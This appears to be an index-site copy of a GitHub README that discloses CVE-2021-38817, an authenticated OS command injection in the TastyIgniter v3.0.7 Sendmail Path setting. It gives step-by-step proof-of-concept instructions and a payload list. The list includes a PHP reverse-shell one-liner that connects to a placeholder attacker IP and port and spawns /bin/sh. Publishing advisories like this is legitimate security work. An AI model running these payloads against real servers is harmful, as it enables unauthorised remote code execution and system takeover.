Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/huskyhacks/cve-2021-38817-remote-os-command-injection
Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field
https://github.com/huskyhacks/cve-2021-38817-remote-os-command-injection
Last synced: 30 days ago
JSON representation
Remote OS Command Injection in TastyIgniter v3.0.7 Sendmail Path field
- Host: GitHub
- URL: https://github.com/huskyhacks/cve-2021-38817-remote-os-command-injection
- Owner: HuskyHacks
- Created: 2021-08-15T02:15:54.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-11-08T22:31:37.000Z (about 2 years ago)
- Last Synced: 2024-12-09T19:52:12.460Z (about 1 month ago)
- Homepage:
- Size: 11.7 KB
- Stars: 7
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2021-38817-Remote-OS-Command-Injection
Authenticated Remote OS Command Injection/Remote Code Execution in TastyIgniter v3.0.7 Sendmail web part (CVE-2021-38817)An authenticated remote OS command injection vulnerability exists in the TastyIgniter v3.0.7 Restaurtant CMS Sendmail configuration menu for the web application. The Sendmail Path parameter is not sanitized properly, as indicated by the `/usr/sbin/sendmail -bs` command populated in the field, and allows arbitrary command to be injected by adding a semi-colon and an additional OS command.
## Affected Components
### URL: `/admin/settings/edit/mail`
### Field:
- Mail Protocol: Sendmail
- Field: Sendmail Path## POC
- Authenticate to the /admin portal with credentials.
- Browse to `/admin/settings/edit/mail`
- In the `Mail Protocol` drop down menu, select `Sendmail`
- In the new `SendMail Path` field, add a semi-colon and an arbitrary OS command, i.e. `/usr/sbin/sendmail -bs; sleep 10`## Payloads
- `/usr/sbin/sendmail -bs; sleep 10`
- `/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'`
![TastyIgniterCVE](https://user-images.githubusercontent.com/57866415/129465103-f4a1349c-c25e-43c7-909c-711dcd332b06.gif)## Discovered by
Matt Kiely (HuskyHacks) and Mike Padrick (Fearless), August 2021CVE assigned Oct 2022 (lmfao)